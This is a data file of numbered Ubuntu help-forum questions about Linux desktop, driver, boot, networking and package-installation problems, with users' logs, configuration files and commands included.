438615	a part of rhythmbox interface is missing	i have a problem with rythmbox ( view the image , a part of the playlist is missing - song title ) but i do n't think that the problem is rhythmbox because two days ago i did n't have that problem . is there a way to know where the problem came from ? i have got errors with xorg , when i started my session i have got the bug reporter that popup and tell me if i want to report a bug report for xorg . i have also installed python 2 and django . i ask this question to know if there 's a way to determine the source of the problem . i got no errors when i launch it from console . i reinstalled it but the problem persist .
438617	snzip via apt-get ?	the snzip is a data compressor , based on the google snappy library . i 've found and installed the library itself via apt-get : sudo apt-get install libsnappy-dev but it does n't include the command tool ( which afaik is called snzip ) . is it any way to download the already built snzip via apt-get ?
438618	2 windows bootable partitions	i installed ubuntu 13.10 alongside windows 7 on my laptop and now i have two bootable windows partitions sda1 and sda2 . there is a third partition for windows sda3 as recovery . is this normal after installing a second operating system ?
438620	apt-get install : is there a command to work on a batch of packages ?	i notice that whenever i use the command sudo apt-get -y autoremove quite a number of packages that i need is on the list to be removed . after going through some of the posts on this forum , i have the impression that the command removes packages that have been automatically installed . to prevent autoremoval of a package , i will have to mark it as sudo apt-get install < package-name > suppose i have 120 packages earmarked for autoremoval . how do i mark them as manually installed with a single command ?
438623	trying to install kdenlive -- source directory ?	i am a total linux illiterate , but i 'm trying to get my head down and make things work . i have downloaded kdenlive from web , want to install in root but get error message after typing sudo make install error message : no rule to make target 'install ' . stop . what to do ? instruction to install also say : to compile and install , go in the source directory and type : mkdir build ; cd build cmake .. ( if you want to install in a different path , use instead : cmake .. -dcmake_install_prefix=/install/path ) make i do n't know where the source directory is ... .i scimmed the web but ca n't find anything that answers this simple ( i assume ) question . help really appreciated . thank you in advance
438624	inserting a date and time of execution of a bash script into a file	i need to figure out how to automatically insert a date and time of execution of a certain bash script file , into a txt file . lets just say i have a bash script named backup.sh , and each time backup.sh executes , it would automatically create a txt file named execution.txt , and within that txt file , the date and time of the execution of backup.sh would be written there . does anyone have ideas to do this ? i have googled for some answers , but found nothing . any help would be appreciated ! thanks in advance .
438629	can not access horizon dashboard after log out	i have installed openstack on ubuntu 12.04 server on virtual box following the tutorial from here everything was set up well and i was also able to access horizon dashboard . but when i power off vm or restart my system then again start vm i can not access , google chrome shows oops ! google chrome could not connect to i can ping adapter 2 from my host os . any solution how to make it working again ?
438630	apt-get says version was not found but it is there	i 've added this repository `` ppa : videolan/stable-daily '' using this command : sudo apt-add-repository ppa : videolan/stable-daily thin i wrote this command : sudo apt-get update & & sudo apt-get install vlc=2.1.2+git20140320+r54512+18+11~ubuntu14.04.1 finally i got this massage : e : version '2.1.2+git20140320+r54512+18+11~ubuntu14.04.1 ' for 'vlc ' was not found even though i can see it in the repository page . i have ubuntu 13.10 . is this because of the `` ubuntu14.04.1 '' in the end of the version name , if yes how can i work around it ?
438631	distributed share storage across wan	i 'd like to build something which looks like `` branchcache '' in windows server with ubuntu . that is : - publish/share a folder on an ubuntu server in site a - have a user located in site b access the file but through a `` file cache '' on the server located on site b ( to have a better user experience ) . what are the tools needed and the process to get this behaviour ? best regards
438633	how safe is ubuntu touch on nexus 7 2012	i do n't know if the version provided by ubuntu for grouper is complete , or if its safe . i just want a portable linux ( ubuntu ) device . that can handle everything that my pc can ( quite easily . ) any will grouper receive any major updates from cannonical ?
438634	how would i edit a .conf file without gedit from the terminal ?	i guess my question is closer to `` how would i go about editing a .conf file from a remote connection via an ssh terminal ? '' i downloaded an ssh emulator to my iphone which works fine and dandy , and i can ssh to my computer at home via dns services . right now i 'm trying to annoy my room mates who are home right now my getting my machine to beep . in order to do that i need to edit /etc/modprobe.d/blacklist.config . i tried sudoedit but i got no text . anything graphical is out of the question , because i 'm essentially in a dedicated terminal like if you pressed ctrl+alt+f1 .
438640	instalation trouble	i was trying to install ubuntu 13 and i had done a search on the cd and it said there were no defects and i could run ubuntu of the cd but when i went to install it it was fine until lit got to the bit where it asked for wifi . i entered it and it said i was connected on the right side but the installation took ages and made no progress what should i do ?
438644	wifi password is too short	i can not connect to the internet using ubuntu . it is saying that the wifi password is too short and is incorrect . i know it is correct because i use a chromebook and it just work specifically fine on the it is just ubuntu . i have installed ubuntu multiple time to get this fixed but it seems that not one single of them will expect the wifi password . thanks , billy
438646	after installing system update i ca n't login to my user	at the login screen , i type my password , then hit enter and i see a quick black screen with some text , as if something crashed , and it goes back to the login screen.. help ?
438655	lenovo thinkpad t440p - wifi interface not listed	i recently purchased a lenovo thinkpad t440p , where i installed ubuntu 13.04 , with the following networking options : wifi card intel dual band wireless 7260ac with bluetooth 4.0 3g/hspa+ built-in module ( ericsson n5321 ) when i run ifconfig , i get only eth0 and lo listed . when i run lspci : 00:00.0 host bridge : intel corporation haswell dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation haswell pci express x16 controller ( rev 06 ) 00:01.1 pci bridge : intel corporation haswell pci express x8 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation haswell hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation lynx point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation lynx point mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation lynx point kt controller ( rev 04 ) 00:19.0 ethernet controller : intel corporation ethernet connection i217-lm ( rev 04 ) 00:1a.0 usb controller : intel corporation lynx point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation lynx point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation lynx point pci express root port # 1 ( rev d4 ) 00:1c.1 pci bridge : intel corporation lynx point pci express root port # 2 ( rev d4 ) 00:1d.0 usb controller : intel corporation lynx point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation lynx point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation lynx point 6-port sata controller 1 [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation lynx point smbus controller ( rev 04 ) 02:00.0 vga compatible controller : nvidia corporation gk208m [ geforce gt 730m ] ( rev a1 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5227 ( rev 01 ) 04:00.0 network controller : intel corporation device 08b2 ( rev 83 ) here is the output of uname -a linux flo-thinkpad-t440p 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux it seems the required firmware is included with kernel 3.10+ if i understand well what 's written at http : //wireless.kernel.org/en/users/drivers/iwlwifi and my kernel is currently at 3.8 something . do i need to find the right backport to actually enable wifi or is there something easier to do ? thanks in advance !
438658	is there a way to restore /lib/modules ?	i accidentally deleted /lib/modules is there a way to restore this ?
438660	latexit alternative for ubuntu	on my mac i was using latexit . it takes a latex code and produces instant pdfs ( or pngs , jpgs , etcâś ) . i 'm sure there 's a similar programme for ubuntu . but i was unable to find one . any ideas ? thanks in advance , markus .
438662	ubuntu 12.04 ext4-fs error/inode	i am running a dell poweredge t420 with ubuntu 12.04 32bit . the hard drives are a raid1 setup . last week , i began getting errors that cause the build i am running to fail . i found this in the log file . [ 970972.123632 ] ext4-fs error ( device sda1 ) : ext4_ext_check_inode:464 : inode # 31202 702 : comm python : bad header/extent : invalid extent entries - magic f30a , entries 1 , max 4 ( 4 ) , depth 0 ( 0 ) [ 970972.123636 ] aborting journal on device sda1-8 . [ 970972.123681 ] ext4-fs ( sda1 ) : remounting filesystem read-only i have run fsck on boot , it seems to find errors and correct them but the issue repeats if i kick off a new build . i have also booted from a live cd and run e2fsck -ccfkp . that completes and indicates it updated bad block inode . issue repeats if i start a new build . the inode # 31202 is the same every time . any ideas on where to start troubleshooting ?
438663	asus ul30jt , grub not loading	i have asus ul30jt notebook , and i ca n't install any new system . when i try to install ubuntu i see black screen with cursor- '' underscore '' . looks like problem with nvindia card and it 's drivers , and should be solved here http : //ubuntuforums.org/showthread.php ? t=1613132 with nomodeset problem is - i ca n't open grub with shift key . so 2 questions : 1 ) how i can test if grub is working in first place ? 2 ) how i can set nomodeset to flashdrive from the start ?
438664	why does n't workspace switcher icon appear in launcher ?	i am new to ubuntu , and the workspace concept intrigues me . using help , i find that there is an icon for the workspace switcher , and it is not where the help document says it should be . why not ?
438667	folder/file options	i 'd like to use the file preferences settings as someone replied on my last question , but there is no `` file preferences '' tab available in the home folder that pops up when i click on it in the launcher . is there a keystroke combination i need to use ? if so what is it ? the answer i received said `` in nautilus ... ... '' is there some other utility or application ( nautilus ) i need to launch to configure the gui preferences that came with the desktop in 12.04.4 ? there is a process called nautilus running on my laptop . it is process id 19595 , using 36.1 mb of system ram and priority normal . i would like to view/manipulate the directory structure in my shiny new version of ubuntu through the provided gui , as i can do very proficiently from the command line . i am trying to teach my children how command line operations like ls -al and chmod in the gui are difficult , time consuming , eat power and are supposed to be for the benefit of the user . in doing so , i am demonstrating my limitations and inexperience in this nautilus gui , as well as proving my point to them that , in the long term , it is far easier and faster to learn the command line and scripting .
438670	install font tahoma in ubuntu	when i installing font tahoma , with this code , i have 2 errors ( permissions denied ) . sorry for my english . : ) tomasz @ tomaszpc : ~ $ cabextract -f 'tahoma*ttf ' ielpkth.cab ielpkth.cab : warning ; possible 5592 extra bytes at end of file . extracting cabinet : ielpkth.cab extracting tahoma.ttf tahoma.ttf : permission denied extracting tahomabd.ttf tahomabd.ttf : permission denied wget http : //download.microsoft.com/download/ie6sp1/finrel/6_sp1/w98nt42kmexp/en-us/ielpkth.cab cabextract -f 'tahoma*ttf ' ielpkth.cab mkdir -p /usr/share/fonts/truetype/msttcorefonts/ mv -f tahoma*ttf /usr/share/fonts/truetype/msttcorefonts/ chmod 644 /usr/share/fonts/truetype/msttcorefonts/tahoma* fc-cache -v rm -f ielpkth.cab
438671	ca n't install php extension sdo on ubuntu 12.10	i 'm running ubuntu 12.10 with php version 5.4.6-1ubuntu1.7 . i have tried the standard instructions to install sdo : http : //us2.php.net/manual/en/sdo.installation.php as well as the instructions in the comments on : https : //bugs.php.net/bug.php ? id=58951 . i even tried this unofficial version on github : https : //github.com/clockwerx/sdo . ( i also tried all of the above with a newer php version - 5.5.9+dfsg-1+sury.org~quantal+1 from https : //launchpad.net/~ondrej/+archive/php5 ) all methods error out during make . i am trying to install this so that i can use an ups 's api for shipping methods . any help is greatly appreciated !
438672	problem loading ubuntu 13 after install	installed ubuntu 13 to new computer . no error msgs during install , everything seemed to work fine . at the end of the install , did the system restart and the computer booted but just hung up on a blank orange screen after the system checks . powered off and tried again multiple times with the same result . if the install disk is in the dvd drive the computer will load the os from the disc when booting . no disk and you just get the orange screen . this is a new gaming pc with lots of memory running an intel processor . any help would be appreciated . thanks intel i7-4820k 3.7 ghz processor 2tb sata iii western digital hard drive evga nvidia geforce gtx video card now it boots to grub 2.0 menu . when i select ubuntu it tries to load it but just hangs at `` loading initial ramdisk ''
438673	12.04 lts - desktop items take long time to appear after login	my ubuntu worked fine until 1 month ago . i ran then a regular sw update via update manager and since then the elements on my desktop take about 20 seconds to appear after log in . before this update they appeared almost immediately after having logged in . any idea what the problem could be ? my hw is a toshiba satellite l850 1l1 btw
438675	missing file - wouldnt load- i just want linux	i am downloading ubuntu through the website . i am downloading ubuntu 12.04 lts desktop . i already downloaded it once and rebooted my computer but when i tried loading it i got the message that there were missing files and ubuntu wont work . i downloaded the file in firefox and opened it with cyber link ios viewer . i honestly have no idea what i 'm doing , i just want linux along side my windows ! please help !
438678	share name only without disk or comments in smbclient	smbclient -l 172.17.88.43 gives the list of share names , disk , and comment like this : path is 172.17.88.43 sharename type comment -- -- -- -- - -- -- -- -- -- - admin $ disk remote admin audio ( unabridged ) ( 32 kbps 22 khz ) read by john telfer disk c $ disk default share cs 1.6 disk d $ disk default share i $ disk default share ipc $ ipc remote ipc users disk session request to 172.17.88.43 failed ( called name not present ) session request to 172 failed ( called name not present ) session request to *smbserver failed ( called name not present ) netbios over tcp disabled -- no workgroup available it 's a lot of mess , is there any way to find only share names not this disks or comments ? or any way ( by coding ) to separate this ?
438679	libq-dev fails to install	when i try to install libpq-dev it fails to install and gives me the folowing error : the following packages have unmet dependencies : libpq-dev : depends : libpq5 ( = 8.4.8-0ubuntu0.10.04 ) but 8.4.12-0ubuntu10.04 is to be installed e : broken packages i tried updating libq5 but not luck it says it 's at newest version . i 'm using backtrack distro which is practically ubuntu .
438680	how to open the terminal in ubuntu	i am trying to correct my boot up to black screen but do n't know how to get to the command prompt . environment is ubuntu server 12.04 here is a line of code that was given to me in an answer . pkexec gedit /etc/default/grub sorry i 'm so lame but at least i was able to stand up my server to black screen . my netgear genie shows my box on the network map . not too bad for a beginner i spose . thanks for all your help folks . kenny
438683	bridge ethernet and firewire	i 'm trying to connection between my eth0 and firewire0 interfaces on an ubuntu 12.04 server . i tried using brctrl , but it apparently does n't support firewire : samuelwn @ master : ~ $ sudo brctl addif br0 eth0 firewire0 ca n't add firewire0 to bridge br0 : invalid argument the firewire connection itself is configured properly and works fine ( i can ssh through it ) , but i 'm wondering if anyone out there knows of a way to bridge ethernet and firewire . i searched through google and could n't come up with anything . thanks .
438694	can someone please verify my new 10-monitor.conf set up ? 12.04	i 'm working on getting x to recognize my displaylink adapter . i have an onboard intel hd 3000 chipset . here is the uldfb : lloydm @ lloydm-e6320 : ~ $ dmesg | grep -i udlfb [ 20006.928772 ] udlfb : displaylink iogear external dvi - serial # 112644 [ 20006.928780 ] udlfb : vid_17e9 & pid_0059 & rev_0102 driver 's dlfb_data struct at ffff880157ec4000 [ 20006.928781 ] udlfb : console enable=1 [ 20006.928782 ] udlfb : fb_defio enable=1 [ 20006.928783 ] udlfb : shadow enable=1 [ 20006.928882 ] udlfb : vendor descriptor length:22 data:22 5f 01 0020 05 00 01 03 04 02 [ 20006.928884 ] udlfb : dl chip limited to 2080000 pixel modes [ 20006.928940 ] udlfb : allocated 4 65024 byte urbs [ 20006.929002 ] usbcore : registered new interface driver udlfb [ 20007.023505 ] udlfb : 1920x1200 beyond chip capabilities [ 20007.023515 ] udlfb : 720x400 @ 70 hz valid mode [ 20007.023521 ] udlfb : 640x480 @ 60 hz valid mode [ 20007.023524 ] udlfb : 640x480 @ 75 hz valid mode [ 20007.023528 ] udlfb : 800x600 @ 60 hz valid mode [ 20007.023531 ] udlfb : 800x600 @ 75 hz valid mode [ 20007.023535 ] udlfb : 1024x768 @ 60 hz valid mode [ 20007.023539 ] udlfb : 1024x768 @ 75 hz valid mode [ 20007.023543 ] udlfb : 1280x1024 @ 75 hz valid mode [ 20007.023546 ] udlfb : 1280x1024 @ 60 hz valid mode [ 20007.023550 ] udlfb : 1600x1200 @ 60 hz valid mode [ 20007.023553 ] udlfb : 1920x1200 beyond chip capabilities [ 20007.023556 ] udlfb : 1152x864 @ 75 hz valid mode [ 20007.023561 ] udlfb : reallocating framebuffer . addresses will change ! [ 20007.025615 ] udlfb : 1600x1200 @ 60 hz valid mode [ 20007.025619 ] udlfb : set_par mode 1600x1200 [ 20007.035253 ] udlfb : displaylink usb device /dev/fb1 attached . 1600x1200 resolution . using 7504k framebuffer memory [ 35424.954154 ] udlfb : open /dev/fb1 user=1 fb_info=ffff880157ec2000 count=1 [ 35427.104763 ] udlfb : released /dev/fb1 user=1 count=0 this was successful : sudo dd if=test.png of=/dev/fb1 7500+1 records in 7500+1 records out 3840024 bytes ( 3.8 mb ) copied , 0.260879 s , 14.7 mb/s a little misaligned ( 1/4 '' wraparound to the right ) , but it was successful . this is my current xrandr config : screen 0 : minimum 320 x 200 , current 3840 x 1200 , maximum 32767 x 32767 lvds1 connected ( normal left inverted right x axis y axis ) 1366x768 60.0 + 40.0 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected primary 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) hdmi3 connected 1920x1200+1920+0 ( normal left inverted right x axis y axis ) 518mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 dp2 disconnected ( normal left inverted right x axis y axis ) dp3 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) here is my proposed 10-monitor.conf configuration file ( not applied yet ) : section `` device '' identifier `` intel '' driver `` intel '' endsection section `` device '' identifier `` dl1 '' driver `` displaylink '' option `` fbdev '' `` /dev/fb1 '' endsection section `` monitor '' identifier `` monitor0 '' endsection section `` monitor '' identifier `` monitor1 '' endsection section `` monitor '' identifier `` monitor2 '' endsection section `` screen '' identifier `` screen0 '' device `` dl1 '' monitor `` monitor0 '' defaultdepth 16 endsection section `` screen '' identifier `` screen1 '' device `` intel '' monitor `` monitor1 '' defaultdepth 16 endsection section `` screen '' identifier `` screen2 '' device `` intel '' monitor `` monitor2 '' defaultdepth 16 endsection section `` serverlayout '' identifier `` multihead '' screen 0 `` screen0 '' 1280 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' option `` xinerama '' `` on '' endsection i had to build it by hand . i 'm not a super linux god yet . i have three monitors , two are working by default . i would like for someone who knows x way better than me to take a look at it before i apply it because i really do n't feel like breaking my box . again . is this a right configuration ?
438695	android sdk on ubuntu 13.10	i 'm installing android sdk on ubuntu 13.10 using this guide http : //tutorialforlinux.com/2013/11/25/how-to-install-android-sdk-on-ubuntu-13-10-saucy-easy-visual-guide/ i 'm stuck on updating android sdk tool and api 's step 7 . when i cd /opt/android-sdk* the command works but when i enter sudo su -c `` tools/android '' command i get bash : tools/android : permission denied what am i doing wrong and yes i 've seen the guide to install open sdk here but i do n't want to install the open sdk i need the normal java version .
438699	having issues recording minecraft with glc-capture	i 'm running ubuntu 13.10 and i 'm trying to record some gameplay , as you probably can tell from the title . however , i ca n't get glc-capture to start minecraft , it returns this error that i can make little sense of : : ~ $ glc-capture java -jar '.minecraft/bin/minecraft.jar' exception in thread `` main '' java.lang.noclassdeffounderror : org/lwjgl/lwjglexception at java.lang.class.getdeclaredmethods0 ( native method ) at java.lang.class.privategetdeclaredmethods ( class.java:2531 ) at java.lang.class.getmethod0 ( class.java:2774 ) at java.lang.class.getmethod ( class.java:1663 ) at sun.launcher.launcherhelper.getmainmethod ( launcherhelper.java:494 ) at sun.launcher.launcherhelper.checkandloadmain ( launcherhelper.java:486 ) caused by : java.lang.classnotfoundexception : org.lwjgl.lwjglexception at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:354 ) at java.lang.classloader.loadclass ( classloader.java:425 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:308 ) at java.lang.classloader.loadclass ( classloader.java:358 ) ... 6 more that is what comes up when i launch the minecraft jar directly . i get this : : ~ $ glc-capture java -jar .minecraft/launcher.jar no main manifest attribute , in .minecraft/launcher.jar when i attempt to launch minecraft via the launcher jar . i know minecraft can launch and run fine and gtk-recordmydesktop records it just fine , i wanted to try glc because i 've heard it 's lighter on performance . does anyone know why i am getting these errors and/or how i can use glc to record minecraft ?
438700	kubuntu 12.04 wo n't boot - busybox	i 'm using software raid1 and installation was fine . i booted in , updated , installed programs , etc . then when i restarted i got sent to the busybox prompt . at the advice of people in this forum , i restarted with the live usb and used boot repair with the instructed raid libraries but upon reboot i go right back to the busybox . here are my results from boot repair http : //paste.ubuntu.com/7147766/ any advice ? thanks , -ian
438704	touchpad cursor jumps on click ( not typing )	i have setup my touchpad so that it does n't move around when i am typing with the following config : https : //github.com/fommil/unix/blob/master/profiles/sampo/.xsession.local but it is incredibly infuriating that the cursor jumps ( transports to another location , far away from where it was ) sometimes when i am moving the cursor or - especially - when i click something . a double click triggers this with a high degree of repeatability . this is definitely not an accidental `` palm '' detection , because even intentional random movements on the touchpad do n't produce such a dramatic movement . when the cursor jumps , it tends to go to the middle bottom of the screen . i.e . this is not what some other people call `` jumping '' . i also have a touchscreen , but the problem continues even when i disable the touchscreen with xinput . this is the xinput setup for my touchpad , any advice greatly appreciated as this is driving me crazy : xinput -- list-props 12 device 'synps/2 synaptics touchpad ' : device enabled ( 133 ) : 1 coordinate transformation matrix ( 135 ) : 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 , 0.000000 , 0.000000 , 0.000000 , 1.000000 device accel profile ( 260 ) : 1 device accel constant deceleration ( 261 ) : 2.500000 device accel adaptive deceleration ( 262 ) : 1.000000 device accel velocity scaling ( 263 ) : 12.500000 synaptics edges ( 284 ) : 1766 , 5382 , 1639 , 4491 synaptics finger ( 285 ) : 20 , 50 , 0 synaptics tap time ( 286 ) : 180 synaptics tap move ( 287 ) : 235 synaptics tap durations ( 288 ) : 180 , 180 , 100 synaptics clickpad ( 289 ) : 1 synaptics middle button timeout ( 290 ) : 0 synaptics two-finger pressure ( 291 ) : 282 synaptics two-finger width ( 292 ) : 7 synaptics scrolling distance ( 293 ) : -111 , -111 synaptics edge scrolling ( 294 ) : 0 , 0 , 0 synaptics two-finger scrolling ( 295 ) : 1 , 0 synaptics move speed ( 296 ) : 1.000000 , 3.000000 , 0.037362 , 0.000000 synaptics off ( 297 ) : 2 synaptics locked drags ( 298 ) : 0 synaptics locked drags timeout ( 299 ) : 5000 synaptics tap action ( 300 ) : 0 , 0 , 0 , 0 , 1 , 3 , 2 synaptics click action ( 301 ) : 1 , 3 , 2 synaptics circular scrolling ( 302 ) : 0 synaptics circular scrolling distance ( 303 ) : 0.100000 synaptics circular scrolling trigger ( 304 ) : 0 synaptics palm detection ( 305 ) : 0 synaptics palm dimensions ( 306 ) : 10 , 200 synaptics coasting speed ( 307 ) : 20.000000 , 50.000000 synaptics pressure motion ( 308 ) : 30 , 160 synaptics pressure motion factor ( 309 ) : 1.000000 , 1.000000 synaptics grab event device ( 310 ) : 1 synaptics gestures ( 311 ) : 0 synaptics capabilities ( 312 ) : 1 , 0 , 0 , 1 , 1 , 1 , 1 synaptics pad resolution ( 313 ) : 60 , 45 synaptics area ( 314 ) : 0 , 0 , 0 , 0 synaptics soft button areas ( 315 ) : 3574 , 0 , 4125 , 0 , 0 , 0 , 0 , 0 synaptics noise cancellation ( 316 ) : 26 , 26 device product id ( 252 ) : 2 , 7 device node ( 253 ) : `` /dev/input/event7 ''
438713	firefox ignoring proxy settings and connecting directly	i have ubuntu 12.04 and it 's been a couple of months that i have this problem . the problem is that firefox 's proxy settings has no effect on it and despite what settings i set in edit- > preferences- > advanced-network- > settigs , it always connects directly to the internet . configuring by foxyproxy extension does not work too . even setting system 's settings ( system settings- > network- > network proxy- > apply system wide ) has no effect . other browsers like chrome work fine . system information : ubuntu 12.04 lts 64-bit firefox 26.0 ( i had this problem in 25 too ) solved : i do n't know why , but once i run sudo firefox the problem went away !
438714	huawei e353 hspa usb stick not working on ubuntu 12.04lts	i would like to use the mobile broadband usb-dongle to connect to internet . 1 ) in the right upper corner , network menu , ( after pluging the usb-dongle ) , i should , but i dont ) see , `` enable mobile broadband '' 2 ) in the right upper corner , network menu > edit connections > mobile broadband > add > create connection for this mobile broadband device ( after pluging the usb-dongle ) , i should , but i do n't see ) , `` huawei thecnologies huawei mobile '' this did n't work : ( file `` ./mario_huawei_e353 '' ) # ! /bin/bash echo 12d1 1446 > /sys/bus/usb-serial/drivers/option1/new_id sudo cp `` ./mario_huawei_e353 '' `` /usr/bin/mario_huawei_e353 '' ; sudo chmod +x `` /usr/bin/mario_huawei_e353 '' ; ( file `` ./mario_huawei_e353.rules '' ) attrs { idvendor } == '' 12d1 '' , attrs { idproduct } == '' 1446 '' , run+= '' /usr/bin/mario_huawei_e353 '' attrs { idvendor } == '' 12d1 '' , attrs { idproduct } == '' 1446 '' , run+= '' /sbin/modprobe option '' sudo cp `` ./mario_huawei_e353.rules '' `` /etc/udev/rules.d/mario_huawei_e353.rules '' ; sudo service network-manager restart sudo reboot following commands results : # username @ desktop : ~ $ uname -a linux name-desktop 3.8.0-37-generic # 53~precise1-ubuntu smp wed feb 19 21:39:14 utc 2014 i686 i686 i386 gnu/linux ( hardware is 64-bit capable , but i prefered 32-bit because i 'm new to linux ) # username @ desktop : ~ $ lsusb bus 003 device 005 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) # username @ desktop : ~ $ usb-devices t : bus=03 lev=01 prnt=01 port=08 cnt=04 dev # = 5 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=12d1 prodid=1446 rev=00.00 s : manufacturer=huawei technologies s : product=huawei mobile c : # ifs= 2 cfg # = 1 atr=c0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) i : if # = 1 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage # username @ desktop : ~ $ dmesg | tail [ 32.736556 ] usbcore : registered new interface driver usb-storage [ 32.736557 ] usb mass storage support registered . [ 33.737623 ] scsi 10:0:0:0 : cd-rom huawei mass storage 2.31 pq : 0 ansi : 2 [ 33.739327 ] scsi 11:0:0:0 : direct-access huawei tf card storage pq : 0 ansi : 2 [ 33.743709 ] sr1 : scsi-1 drive [ 33.743776 ] sr 10:0:0:0 : attached scsi cd-rom sr1 [ 33.743815 ] sr 10:0:0:0 : attached scsi generic sg3 type 5 [ 33.743968 ] sd 11:0:0:0 : attached scsi generic sg4 type 0 [ 33.752032 ] sd 11:0:0:0 : [ sdc ] attached scsi removable disk [ 37.142149 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) # username @ desktop : ~ $ lsusb -v -d 12d1:1446 bus 003 device 005 : id 12d1:1446 huawei technologies co. , ltd. e1552/e1800 ( hspa modem ) device descriptor : blength 18 bdescriptortype 1 bcdusb 2.00 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x12d1 huawei technologies co. , ltd. idproduct 0x1446 e1552/e1800 ( hspa modem ) bcddevice 0.00 imanufacturer 3 iproduct 2 iserial 0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 55 bnuminterfaces 2 bconfigurationvalue 1 iconfiguration 1 bmattributes 0xc0 self powered maxpower 500ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x01 ep 1 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 1 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk-only iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x82 ep 2 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 # username @ desktop : ~ $ lsmod module size used by usb_storage 48053 0 option 33795 0 usb_wwan 14859 1 option usbserial 27633 2 option , usb_wwan snd_hda_codec_realtek 69328 1 snd_hda_codec_hdmi 36612 1 coretemp 13324 0 kvm_intel 127786 0 kvm 384758 1 kvm_intel aesni_intel 18196 0 ablk_helper 13357 1 aesni_intel cryptd 19821 1 ablk_helper lrw 13127 1 aesni_intel aes_i586 16995 1 aesni_intel xts 12778 1 aesni_intel gf128mul 14503 2 lrw , xts mxm_wmi 12893 0 snd_hda_intel 38819 5 snd_hda_codec 118650 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel bnep 17919 2 snd_hwdep 13276 1 snd_hda_codec snd_pcm 85934 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec rfcomm 38400 0 bluetooth 211586 10 bnep , rfcomm snd_seq_midi 13132 0 snd_rawmidi 25157 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51593 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq i915 554804 3 joydev 17329 0 parport_pc 27612 0 psmouse 82769 0 drm_kms_helper 47749 1 i915 ppdev 12849 0 microcode 18433 0 serio_raw 13031 0 drm 233935 4 i915 , drm_kms_helper lpc_ich 17048 0 snd 57014 20 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device i2c_algo_bit 13316 1 i915 soundcore 12600 1 snd snd_page_alloc 18398 2 snd_hda_intel , snd_pcm wmi 18744 1 mxm_wmi mac_hid 13077 0 video 19116 1 i915 mei 36756 0 binfmt_misc 17292 1 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp hid_generic 12484 0 usbhid 46125 0 hid 87362 2 hid_generic , usbhid igb 129026 0 